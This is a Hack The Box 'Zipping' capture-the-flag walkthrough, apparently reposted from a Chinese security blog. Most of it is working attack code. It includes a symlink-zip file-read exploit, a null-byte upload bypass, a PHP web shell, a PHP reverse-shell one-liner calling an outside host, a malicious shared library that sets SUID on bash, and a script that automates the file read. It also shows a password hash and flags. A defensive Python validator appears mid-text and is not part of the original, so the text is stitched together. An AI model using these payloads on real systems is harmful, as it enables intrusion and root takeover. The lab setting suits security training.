HTB-Zipping Notes

admin, 2024-08-05 22:46:50


First, scan the target.

# nmap -sC -sV -Pn 10.10.11.229
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 11:50 CST
Nmap scan report for 10.10.11.229
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)
|_  256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Ubuntu))
|_http-title: Zipping | Watch store
|_http-server-header: Apache/2.4.54 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds


Opening the site and reading the about section, the company appears to be a manufacturer of men's and women's watches. Next, fuzz its directories.


# dirsearch -u http://10.10.11.229/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.11.229/-_23-09-06_11-58-22.txt
Error Log: /root/.dirsearch/logs/errors-23-09-06_11-58-22.log
Target: http://10.10.11.229/

[11:58:23] Starting: 
[11:58:36] 403 -  277B  - /.ht_wsr.txt
[11:58:36] 403 -  277B  - /.htaccess_orig
[11:58:36] 403 -  277B  - /.htaccess.orig
[11:58:36] 403 -  277B  - /.htaccess_extra
[11:58:36] 403 -  277B  - /.htaccess.bak1
[11:58:36] 403 -  277B  - /.htaccess.save
[11:58:36] 403 -  277B  - /.htaccess_sc
[11:58:36] 403 -  277B  - /.htaccessOLD2
[11:58:36] 403 -  277B  - /.htaccessBAK
[11:58:36] 403 -  277B  - /.html
[11:58:36] 403 -  277B  - /.htaccess.sample
[11:58:36] 403 -  277B  - /.htaccessOLD
[11:58:36] 403 -  277B  - /.httr-oauth
[11:58:36] 403 -  277B  - /.htpasswd_test
[11:58:36] 403 -  277B  - /.htm
[11:58:37] 403 -  277B  - /.htpasswds
[11:58:41] 403 -  277B  - /.php
[11:59:33] 301 -  313B  - /assets  ->  http://10.10.11.229/assets/
[11:59:33] 200 -    2KB - /assets/
[12:00:06] 200 -   16KB - /index.php
[12:00:06] 200 -   16KB - /index.php/login/
[12:00:41] 403 -  277B  - /server-status
[12:00:41] 403 -  277B  - /server-status/
[12:00:42] 301 -  311B  - /shop  ->  http://10.10.11.229/shop/
[12:00:55] 200 -    5KB - /upload.php
[12:00:56] 403 -  277B  - /uploads/
[12:00:56] 301 -  314B  - /uploads  ->  http://10.10.11.229/uploads/

Task Completed


The scan turned up an upload page. The site has an upload feature that only accepts zip files; because the archive is extracted on the server, we can create a symlink, zip it, and read files on the server through it. This is an LFI vulnerability.

ln -s ../../../../../../../etc/passwd passwd.pdf
zip --symlinks passwd.zip passwd.pdf

After uploading, click the generated PDF link and capture the request.


The same LFI can be used to read the source code of upload.php.

<html><html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Start your development with Creative Design landing page.">
    <meta name="author" content="Devcrud">
    <title>Zipping | Watch store</title>

    <!-- font icons -->
    <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">

    <!-- Bootstrap + Creative Design main styles -->
    <link rel="stylesheet" href="assets/css/creative-design.css">
</head>
<body data-spy="scroll" data-target=".navbar" data-offset="40" id="home">
    <!-- Page Header -->
    <header class="header header-mini">
       <div class="header-title">Work with Us</div>
       <nav aria-label="breadcrumb">
         <ol class="breadcrumb">
            <li class="breadcrumb-item"><a href="index.php">Home</a></li>
            <li class="breadcrumb-item active" aria-current="page">Work with Us</li>
         </ol>
      </nav>
    </header> <!-- End Of Page Header -->

    <section id="work" class="text-center">
        <!-- container -->
        <div class="container">
            <h1>WORK WITH US</h1>
            <p class="mb-5">If you are interested in working with us, do not hesitate to send us your curriculum.<br> The application will only accept zip files, inside them there must be a pdf file containing your curriculum.</p>

            <?php
            if(isset($_POST['submit'])) {
              // Get the uploaded zip file
              $zipFile = $_FILES['zipFile']['tmp_name'];
              if ($_FILES["zipFile"]["size"] > 300000) {
                echo "<p>File size must be less than 300,000 bytes.</p>";
              } else {
                // Create an md5 hash of the zip file
                $fileHash = md5_file($zipFile);
                // Create a new directory for the extracted files
                $uploadDir = "uploads/$fileHash/";
                // Extract the files from the zip
                $zip = new ZipArchive;
                if ($zip->open($zipFile) === true) {
                  if ($zip->count() > 1) {
                  echo '<p>Please include a single PDF file in the archive.<p>';
                  } else {
                  // Get the name of the compressed file
                  $fileName = $zip->getNameIndex(0);
                  if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {
                    mkdir($uploadDir);
                    echo exec('7z e '.$zipFile. ' -o' .$uploadDir. '>/dev/null');
                    echo '<p>File successfully uploaded and unzipped, a staff member will review your resume as soon as possible. Make sure it has been uploaded correctly by accessing the following path:</p><a href="'.$uploadDir.$fileName.'">'.$uploadDir.$fileName.'</a>'.'</p>';
                  } else {
                    echo "<p>The unzipped file must have  a .pdf extension.</p>";
                  }
                 }
                } else {
                  echo "Error uploading file.";
                }
              }
            }
            ?>
            <!-- Submit File -->
            <form id="zip-form" enctype="multipart/form-data" method="post" action="upload.php">
              <div class="mb-3">
                <input type="file" class="form-control" name="zipFile" accept=".zip">
              </div>
              <button type="submit" class="btn btn-primary" name="submit">Upload</button>
            </form><!-- End submit file -->
        </div><!-- End of Container-->
    </section><!-- End of Contact Section -->
    <!-- Section -->
    <section class="pb-0">
        <!-- Container -->
        <div class="container">
            <!-- Pre footer -->
            <div class="pre-footer">
                <ul class="list">
                    <li class="list-head">
                        <h6 class="font-weight-bold">ABOUT US</h6>
                    </li>
                    <li class="list-body">
                      <p>Zipping Co. is a company that is dedicated to producing high-quality watches that are both stylish and functional. We are constantly pushing the boundaries of what is possible with watch design and are known for their commitment to innovation and customer service.</p>
                        <a href="#"><strong class="text-primary">Zipping</strong> <span class="text-dark">Watch Store</span></a>
                    </li>
                </ul>
                <ul class="list">
                    <li class="list-head">
                        <h6 class="font-weight-bold">USEFUL LINKS</h6>
                    </li>
                    <li class="list-body">
                        <div class="row">
                            <div class="col">
                                <a href="#">Link 1</a>
                                <a href="#">Link 2</a>
                                <a href="#">Link 3</a>
                                <a href="#">Link 4</a>
                            </div>
                            <div class="col">
                                <a href="#">Link 5</a>
                                <a href="#">Link 6</a>
                                <a href="#">Link 7</a>
                                <a href="#">Link 8</a>
                            </div>
                        </div>
                    </li>
                </ul>
                <ul class="list">
                    <li class="list-head">
                        <h6 class="font-weight-bold">CONTACT INFO</h6>
                    </li>
                    <li class="list-body">
                        <p>Contact us and we'll get back to you within 24 hours.</p>
                        <p><i class="ti-location-pin"></i> 12345 Fake ST NoWhere AB Country</p>
                        <p><i class="ti-email"></i>  [email protected]</p>
                        <div class="social-links">
                            <a href="javascript:void(0)" class="link"><i class="ti-facebook"></i></a>
                            <a href="javascript:void(0)" class="link"><i class="ti-twitter-alt"></i></a>
                            <a href="javascript:void(0)" class="link"><i class="ti-google"></i></a>
                            <a href="javascript:void(0)" class="link"><i class="ti-pinterest-alt"></i></a>
                            <a href="javascript:void(0)" class="link"><i class="ti-instagram"></i></a>
                            <a href="javascript:void(0)" class="link"><i class="ti-rss"></i></a>
                        </div>
                    </li>
                </ul>
            </div><!-- End of Pre footer -->

            <!-- foooter -->
            <footer class="footer">
                <p>Made by <a href="https://github.com/xdann1">xDaNN1</p>
            </footer><!-- End of Footer-->
        </div><!--End of Container -->
    </section><!-- End of Section -->

</body></html>

This is where the LFI comes from: the archive is handed to 7z for extraction, which follows the symlink entry inside it.


The code checks whether the extracted file has a pdf extension. We can try injecting a null byte (\0) to terminate the string right after .php: pathinfo() still reports the extension as pdf, while the extractor stops at the null byte. First create a PHP file for testing, then zip it.

https://book.hacktricks.xyz/pentesting-web/file-upload#bypass-file-extensions-checks

<?php echo "jinitaimei"; ?>

zip null.zip test.phpX.pdf

Next, use hexeditor to modify the archive: change the 0x58 byte (the "X" in the filename) to 0x00.


Save the modified archive and upload it to the target. Request the extracted path with the trailing .pdf removed, and the PHP output is returned.
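Both tricks above (the symlink entry and the "test.php\0.pdf" name) slip past upload.php because it trusts the zip entry name as PHP parses it and then lets 7z do the extraction. As an added example that is not part of the original write-up, here is how the upload check could be written so that both archives are rejected before anything is extracted; the PDF magic check, the unpacked-size bound and the helper that builds sample archives in memory are my own additions.

```python
import io
import stat
import struct
import zipfile
from typing import Optional, Tuple

MAX_ZIP_BYTES = 300_000          # same size limit upload.php already applies
MAX_UNPACKED_BYTES = 5_000_000   # bound on the extracted file (not checked by upload.php)

def check_entry_name(raw: bytes) -> Optional[str]:
    """Validate the entry name as the raw bytes stored in the archive.
    Returns a rejection reason, or None if the name is acceptable."""
    if not raw or any(b < 0x20 or b == 0x7F for b in raw):
        # Covers "shell.php\0.pdf": PHP's pathinfo() sees ".pdf", but a C-based
        # extractor stops at the NUL and writes shell.php to disk.
        return "control byte (e.g. NUL) in filename"
    if b"/" in raw or b"\\" in raw:
        return "path separators are not allowed"
    if raw.lower()[-4:] != b".pdf" or len(raw) == 4:
        return "entry must be a .pdf file"
    return None

def validate_resume_zip(data: bytes) -> Tuple[bool, str]:
    """Check an uploaded archive the way upload.php should before extracting it."""
    if len(data) > MAX_ZIP_BYTES:
        return False, "archive too large"
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, "not a zip file"
    infos = zf.infolist()
    if len(infos) != 1:
        return False, "archive must contain exactly one entry"
    info = infos[0]
    # Python's zipfile silently truncates names at NUL, so read the name bytes from
    # the local file header ourselves: 30-byte fixed header, name length at offset 26.
    off = info.header_offset
    name_len = struct.unpack_from("<H", data, off + 26)[0]
    reason = check_entry_name(data[off + 30: off + 30 + name_len])
    if reason:
        return False, reason
    # Unix mode lives in the high 16 bits of external_attr. A symlink entry is what
    # "zip --symlinks" stores; 7z dereferences it, turning extraction into file read.
    if stat.S_ISLNK(info.external_attr >> 16):
        return False, "symlink entries are not allowed"
    if info.file_size > MAX_UNPACKED_BYTES:
        return False, "unpacked file too large"
    if zf.read(info)[:5] != b"%PDF-":
        return False, "content is not a PDF"
    return True, "ok"

def make_zip(name: str, payload: bytes, symlink: bool = False) -> bytes:
    """Constructed sample input: a one-entry zip built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("placeholder")
        info.filename = name          # set directly so a NUL survives into the header
        if symlink:
            info.external_attr = (stat.S_IFLNK | 0o777) << 16   # as zip --symlinks does
        zf.writestr(info, payload)
    return buf.getvalue()
```

The symlink sample stores the link target as the entry's content, which is exactly what the passwd.zip above looks like on disk.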


Using the same method, change the PHP file to a web shell and upload it; remember to URL-encode the command parameter.

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>


php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'

We get a shell. Note that this box has a scheduled job that periodically deletes uploaded files.


User flag obtained: ee453eace87abef17b87c0608c81874e. Run sudo -l to look for privilege escalation paths.

rektsu@zipping:/home/rektsu$ sudo -l
Matching Defaults entries for rektsu on zipping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User rektsu may run the following commands on zipping:
    (ALL) NOPASSWD: /usr/bin/stock
rektsu@zipping:/home/rektsu$


Running strings on the binary reveals the password.

rektsu@zipping:/home/rektsu$ strings /usr/bin/stock
/lib64/ld-linux-x86-64.so.2
mgUa
fgets
stdin
puts
exit
fopen
__libc_start_main
fprintf
dlopen
__isoc99_fscanf
__cxa_finalize
strchr
fclose
__isoc99_scanf
strcmp
__errno_location
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
Hakaize
St0ckM4nager
/root/.stock.csv
Enter the password: 
Invalid password, please try again.
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option: 
You do not have permissions to read the file
File could not be opened.
================== Stock Actual ==================
Colour     Black   Gold    Silver
Amount     %-7d %-7d %-7d
Quality   Excelent Average Poor
Amount    %-9d %-7d %-4d
Exclusive Yes    No
Amount    %-4d   %-4d
Warranty  Yes    No
================== Edit Stock ==================
Enter the information of the watch you wish to update:
Colour (0: black, 1: gold, 2: silver): 
Quality (0: excelent, 1: average, 2: poor): 
Exclusivity (0: yes, 1: no): 
Warranty (0: yes, 1: no): 
Amount: 
Error: The information entered is incorrect
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d
The stock has been updated correctly.
;*3$"
GCC: (Debian 12.2.0-3) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
stock.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
__errno_location@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@GLIBC_2.7
puts@GLIBC_2.2.5
stdin@GLIBC_2.2.5
_edata
fclose@GLIBC_2.2.5
_fini
strchr@GLIBC_2.2.5
fgets@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
dlopen@GLIBC_2.34
fprintf@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
checkAuth
_end
__bss_start
main
fopen@GLIBC_2.2.5
__isoc99_scanf@GLIBC_2.7
exit@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt
.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
rektsu@zipping:/home/rektsu$

The password is: St0ckM4nager


Once the correct password is entered, the executable lets you view and edit the stock kept in /root/.stock.csv. Next, run the binary under strace to see what it does at runtime.

rektsu@zipping:/usr/bin$ strace ./stock
execve("./stock", ["./stock"], 0x7fffc46a3500 /* 16 vars */) = 0
brk(NULL)                               = 0x55ba794bb000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff80acc340) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a950f000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=18225, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 18225, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f67a950a000
close(4)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
read(4, "\177ELF2113��������3�>�1���32062�����"..., 832) = 832
pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=2072888, ...}, AT_EMPTY_PATH) = 0
pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784
mmap(NULL, 2117488, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f67a9200000
mmap(0x7f67a9222000, 1544192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x22000) = 0x7f67a9222000
mmap(0x7f67a939b000, 356352, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x19b000) = 0x7f67a939b000
mmap(0x7f67a93f2000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x1f1000) = 0x7f67a93f2000
mmap(0x7f67a93f8000, 53104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f67a93f8000
close(4)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a9507000
arch_prctl(ARCH_SET_FS, 0x7f67a9507740) = 0
set_tid_address(0x7f67a9507a10)         = 3332
set_robust_list(0x7f67a9507a20, 24)     = 0
rseq(0x7f67a9508060, 0x20, 0, 0x53053053) = 0
mprotect(0x7f67a93f2000, 16384, PROT_READ) = 0
mprotect(0x55ba77512000, 4096, PROT_READ) = 0
mprotect(0x7f67a9545000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f67a950a000, 18225)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
getrandom("\xea\xb9\xf4\x36\x03\x6f\xa2\x87", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x55ba794bb000
brk(0x55ba794dc000)                     = 0x55ba794dc000
newfstatat(0, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
write(1, "Enter the password: ", 20Enter the password: )    = 20
read(0, St0ckM4nager
"St0ckM4nager\n", 1024)         = 13
openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
write(1, "\n================== Menu ======="..., 44
================== Menu ==================) = 44
write(1, "\n", 1
)                       = 1
write(1, "1) See the stock\n", 171) See the stock
)      = 17
write(1, "2) Edit the stock\n", 182) Edit the stock
)     = 18
write(1, "3) Exit the program\n", 203) Exit the program
)   = 20
write(1, "\n", 1


The trace shows the program trying to dlopen /home/rektsu/.config/libcounter.so, which does not exist. Since /home/rektsu/.config/ is writable by us, we can create a malicious libcounter.so and place it there; the binary runs as root under sudo, so whatever the library does at load time runs as root.

Privilege escalation with a C shared library

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("chmod u+s /bin/bash");
}

gcc -shared -fPIC -nostartfiles -o libcounter.so lib.c

Then upload it to /home/rektsu/.config/ and run the binary again.

bash-5.2$ sudo /usr/bin/stock
Enter the password: St0ckM4nager

================== Menu ==================

1) See the stock
2) Edit the stock
3) Exit the program

Select an option: 3
bash-5.2$ /bin/bash -p
bash-5.2# id
uid=1001(rektsu) gid=1001(rektsu) euid=0(root) groups=1001(rektsu)
bash-5.2#


Root flag obtained: db3ce5545891c0a6c87c229352495f5a


root:$y$j9T$IYa44JPNfCWV4rqT1W1Kj/$xiHZCNOyiAOLgnHZ06gdF9jWPNR9ixmhsCwFu0Hgy9/:19548:0:99999:7:::


A one-shot script from an overseas researcher that automates the symlink upload and reads a file from the server (used for the user flag)

import os
from bs4 import BeautifulSoup
import requests

if not os.path.exists("tmp"):
        os.mkdir("tmp")

file_to_read = input("File to read: ")
print("Creating symlink..")
os.chdir("tmp/")
os.system(f"ln -s {file_to_read} symlink.pdf")
print("Zipping..")
os.system(f"zip -r --symlinks sym.zip symlink.pdf")
os.system(f"rm symlink.pdf && cp sym.zip ../")
print("Done! Zip file: sym.zip")

print("Uploading file..")
MIP = "10.10.11.229"
file = {
    'zipFile': ('sym.zip', open('sym.zip','rb'),'application/zip'),
    'submit': (None,'')
}
headers = {"Host":MIP,"User-Agent":"Mozilla/5.0 (X11;Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"}
s  = requests.Session()
r = s.get(f"http://{MIP}",headers=headers)
r = s.get(f"http://{MIP}/upload.php", headers=headers)
r = s.post(f"http://{MIP}/upload.php",files=file,headers=headers)

soup = BeautifulSoup(r.text,features="lxml")

uuid=""
for a in soup.find_all("a",href=True):
        if "uploads" in a['href']:
                uuid = a['href'].split("/")[1]
print("File UUID: ",uuid)
print("\nReading file..")
r = s.get(f"http://{MIP}/uploads/{uuid}/symlink.pdf")
print(r.text)


Originally published on the WeChat public account hades zorejt: HTB-Zipping Notes

Source (CN-SEC): https://cn-sec.com/archives/2013995.html
